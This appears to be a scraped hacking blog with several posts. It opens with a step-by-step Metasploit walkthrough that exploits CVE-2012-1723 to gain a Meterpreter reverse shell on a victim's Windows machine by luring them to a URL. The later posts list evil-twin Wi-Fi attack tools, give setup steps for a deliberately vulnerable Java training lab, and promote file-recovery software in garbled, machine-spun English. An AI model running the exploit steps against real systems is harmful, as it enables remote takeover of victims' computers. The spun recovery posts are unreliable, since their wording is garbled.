Saturday 28 March 2015

Hacking Remote Pc by Exploiting Java Applet Field Bytecode Verifier Cache Remote Code Execution

CVE-2012-1723: This is a vulnerability in the HotSpot bytecode verifier where an invalid optimization of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient type checking. A specially-crafted class file could possibly use this flaw to bypass Java sandbox restrictions, and load additional classes in order to perform malicious operations. The vulnerability was made public by Michael ‘mihi’ Schierl.
Requirement:
  • Attacker Machine: Backtrack
  • Victim Machine: Windows (install JRE un-patched version  )
Step1: Launch the Metasploit console
Open the Terminal in the Attacker Machine(Backtrack).
Type “msfupdate” , this will update the metasploit with latest modules.
Now type “msfconsole” to get interaction with the Metasploit framework.
Step 2:
Type “use exploit/multi/browser/java_verifier_field_access” and follow the below commands:


msf exploit(java_verifier_field_access) > set PAYLOAD java/meterpreter/reverse_http
msf exploit(java_verifier_field_access) > set LHOST [Backtrack IP ADDRESS]
msf exploit(java_verifier_field_access) > exploit
Step 3:
If you follow the above commands correctly, you will get the following result.
Copy the url and open the link in the victim machine. Once the url loaded in the victim machine, it will launch the exploit and creates a new session.
Now type “sessions“, this will show the list of active sessions .
Type “sessions -i 1“, this will open the connection to the session with the id ‘1’ and bring you to Meterpreter. Meterpreter will help you to interact/control the Target.
References:
  • POC: http://schierlm.users.sourceforge.net/CVE-2012-1723.html
  • Metasploit Module: http://www.exploit-db.com/exploits/19717/

How to connect ssl to backtrack using putty



The video is created by Vishnu Sharma. In this video he has showed u how to run ssh service in u r backtrack or any Linux machine using putty .
The download link of putty: http://putty.org

Evil Twin and Fake Wireless Access Point Hacks: What They Are, How To Defend

Hacking is a term with a wide variety of acts associated with it. Some are incredibly complex and demand a high degree of knowledge, others are little more than installing some software on your device and acting a bit…less than ethically.
One of the most common hacks is also one of the easiest to defend against. This is what is known as a fake wireless access point. Hackers use this tactic to easily steal data of unsuspecting wireless users in public places.
What is a fake wireless access point data theft?
This type of attack has a number of nicknames associated with it: AP Phishing, Wi-Fi Phishing, Hotspotter, Evil Twins, and Honeypot AP. All of these are associated with creating a fake Wi-Fi connection that people log into, and whose goal is to steal credentials, logins, and passwords.
To accomplish this, hackers simply use a piece of software, or app, that is designed to capture data that is sent over a wireless connection. Examples of software that is sued during a fake Wi-Fi attack includes:
  • AirSSL
  • AirJack
  • Airsnarf
  • Dsniff
  • Cain
  • void11
No matter which apps are used, the key to it all is setting up a wireless connection that people will want to connect to. When they go to connect to the wireless point they likely won’t suspect a thing. Why? Because this tactic is used most often in public areas.
If you were to go into your local Starbucks, sit down with your mochalatte venti with cream and sugar pumpkin spice, and open up your tablet, finding a connection labelled ‘Starbucks Free WiFi,’ you’d probably connect in a heartbeat (on which is quicken by caffeine, at that). The same goes if you’re on a layover at JFK and you see a connection labelled ‘JFK Free Wi-Fi.- You wouldn’t think twice. That’s what the hackers are counting on – you not thinking.
How is your data stolen during a fake wireless access point theft?
How your most important data is stolen is a little shocking – you give it to them. A large percentage of these hacks take place with a fake wireless point that requires a login and password. Once that information is put into the login, hackers will take it and use it to sign into popular websites, assuming that you use the same login and password for multiple sites.
When your online accounts start showing charges that you didn’t initiate, or if your social media account is taken over, you could be the victim of a fake wireless access point data theft.
How to defend against an ‘Evil Twin’ attack?
There are a number of ways to defend against it, I’ll look at some easy to understand examples:
  • The best defence is to always verify with the wifi provider. Ask the Starbucks staff what their wi-fi is called, it can save you a massive headache. Always remember – if a deal seems too good to be true, like free wifi, it probably is.
  • Use different login details and passwords for public wifi.
    Disconnect auto-connect when you’re in unfamiliar territory.
  • Be cautious when connects suddenly disconnect, especially if it happens for everyone on the network. An app known as aireplay is capable of disconnecting users from wifi, hoping that they’ll reconnect to their fake wifi.
  • Be cautious of certificates. Good websites can occasionally send you one, but if this happens over a public wifi that you don’t know, it is best to back off.
  • If a wifi hotspot is interfering with your VPN, forcing you to shut it down, that is a HUGE red flag. A VPN is a great defence against this attack, and hackers know it. Forcing your VPN to disable when you’re trying to connect is the only way that they can steal your data.
That last point is one I want to look at further. A VPN can be a great defence against this type of attack because it encrypts all of the data that you send out. With this data being encrypted, even when you create your login and password with the fake wifi, your data can not be stolen because it can not be deciphered. We review our Top 10 VPNs over on our website if you’re interested in learning more about them.
A last option that I’ll suggest is using SSL-protected apps. These do take more care and thought to use, but they will offer you protection that is similar to a VPN. Some hackers have even found a way around SSL protection ( the BREACH method), so you may want to explore using this with a secondary defensive measure.
The overall advice is to be cautious and verify before you connect. People look at me weird all the time when I ask for the correct wifi name that I should use to connect to. I’ve never been the victim of an ‘Evil Twin’ attack…I’ll take a funny look or two!

Java Vulnerable Lab – Learn to Hack and secure Java based Web Applications

Pentesting Lab
We (Cyber Security and Privacy Foundation) have developed a vulnerable Java based Web Applicatoin . This app is intended for the Java Programmers and other people who wish to learn about Web application vulnerabilities and write secure code.
The full course on Hacking and Securing Web Java Programs is available in
Warning: Don’t run this app in Your Main Machine or in an online server. Install it in Vitual Machine.
How to setup Java Vulnerable Lab?
Method 1.Very Easiest Method : VirtualBox VM The Most easiest way to use Java Vulnerable is using the VirtualBox VM which has everything set up and ready to use.
Steps:
  1. Install the VirtualBox : https://www.virtualbox.org/wiki/Downloads
  2. Download the VM Image from here : http://sourceforge.net/projects/javavulnerablelab/files/v0.1/JavaVulnerableLab.ova/download
  3. Import the JavaVulnerable.ova into VirtualBox.
  4. Change the Network Settings to Host-Only Network 
  5. Start the Machine and Log into the Machine( Credentials; username: root password: cspf) 
  6. Start Tomcat by entering "service tomcat start" in the Terminal
  7. Start mysql by entering "service mysql start" in the Terminal
  8. Find the IP Address of Machine
  9. In your Browser, go to "http://[IP_ADDRESS_OF_VM]:8080/JavaVulnerableLab/install.jsp 
  10. Click the Install Button
  11. Enjoy :)


Method 2.Easiest Method : Standalone Web Application In this mehtod, you will be running an executable “JAR” file which runs the application with an embedded Apache Tomcat.
Steps:

    1. Install JDK
    2. Download Executable Jar from here: http://sourceforge.net/projects/javavulnerablelab/files/v0.2/JavaVulnerableLab.jar/download
    3. Double Click the JavaVulnerable.jar to run( if double click is not working, run this command "java -jar JavaVulnerable.jar" in your Terminal or CMD)
    4. In your Browser, go to "http://localhost:8080/JavaVulnerableLab/install.jsp 
    5. Click the Install Button

Method 3. Using War file: This is a NORMAL method to deploy the WAR file.
Steps:
   1. Install Apache Tomcat server
   2. Go to http://[Tomcat_INSTALLED_IP]:8080/manager/  (make sure you have modified tomcat-users.xml file of the tomcat to allow the manager).
   3. Download our WAR file from here: https://sourceforge.net/projects/javavulnerablelab/files/latest/JavaVulnerableLab.war/download
   4. Deploy the WAR in Apache Tomcat manager.
   5. Go to http://[Tomcat_INSTALLED_IP]:8080/JavaVulnerableLab/install.jsp 
   6. Click the Install Button

Thursday 24 October 2013

How to recover deleted photo from your digital camera with DeleteFIX ?



If you\'ve got accidentally deleted photos in your camera , no ought to worry, here is that the thanks to recover you photos.








DeleteFIX image is that the solely program designed specifically for digital image recovery, it\'ll recover photos deleted from your camera.




It is the sole image recovery code within the market that recovers each image format from each camera. every camera saves the photos in a very completely different format, and DeleteFIX image is in a position to recover deleted photos from all of them, together with specific formats for skilled cameras from each whole, like Canon, Olympus, Pentax et al..




How to recover the deleted photos?




Download and install DeleteFIX image.

Connect your camera to your laptop.

Run the code and follow the straightforward directions within the program\'s window. read however this digital image recovery code works with pictures.

View the recovered photos within the program\'s viewer window.

Click on the \"Activate\" button within the program itself to get the activation code. That means you may be able to save your photos to your laptop.

The DeleteFix image may recover video and image files from your camera, memory carads USB Devices and additional.

Wednesday 23 October 2013

Recover permanently deleted (Ctrl+alt+del) files

Recover permanently deleted (Ctrl+alt+del) files

recover lost data with kickass undelete



recover lost data with kickass undelete

Recover permanently deleted files




Sometimes we permanently deleted files or erroneously deletes by pressing (Ctrl+Alt+Del) and shortly realizes that they were vital.

For all those folks, we\'ve got an answer. you\'ll bring those files from the hard disc or your flash drive with the help of a software package known as “Kissass Undelete”




Description :

Kickass Undelete could be a free, totally featured, file recovery tool for Windows. Accidentally deleted a file? ne\'er fear; the information is maybe still on your drive and will be retrievable. Kickass Undelete finds all of the deleted files on your Winchester drive, flash drive or sd card and allows you to recover them.



Features



Free and Open source

Support for each NTFS and FAT filesystems

Filter by computer filename and extension

Easy-to-use interface

immoderately massive scan button



Click Here to transfer the software package

Steps to recover your files



Step 1 :-



To start finding out the files, choose the drive from the Left panel of the Windows and click on the scan button.

the Scan might take a few seconds



Step 2 :-



When the files search has been completed, it\'ll show you the results with the name, type, size and the last changed date of the searched file.



Step 3 :-



Now you\'ll choose the file to be recover.



Note :- you\'ll only recover the information if the house that was accessible once the deletion isn\'t been occupied once the deletion.



Enjoy!!

Hiding files in Recycle Bin

Here we are going to discuss about some batch file code . A batch file script is straightforward DOS programming script having extension (.bat)



Step 1 :- first of all you have to merely take away your Recycle Bin from your Desktop.



Step 2 :-

Now goto this link, transfer the files and extract them.



There will be 2 files having name Lock.bat & Key.bat



Hiding files in Recycle Bin








Step 3 :-

Now you retain these 2 (Key.bat & Lock.bat) files in secret place in your pc. so no one can use it. currently just click the file - Lock.bat .

It will produce a brand new Recycle Bin to your desktop, just like earlier one visually but totally different from it functionally.



Hiding files in Recycle Bin








Step 4 :-

Now click on the Key.bat file and copy your non-public files to the “Recycle Bin” folder on your desktop and once more click on Lock.bat to create it Recycle Bin once more. fancy your privacy ;-) ^_^ .








Hiding files in Recycle Bin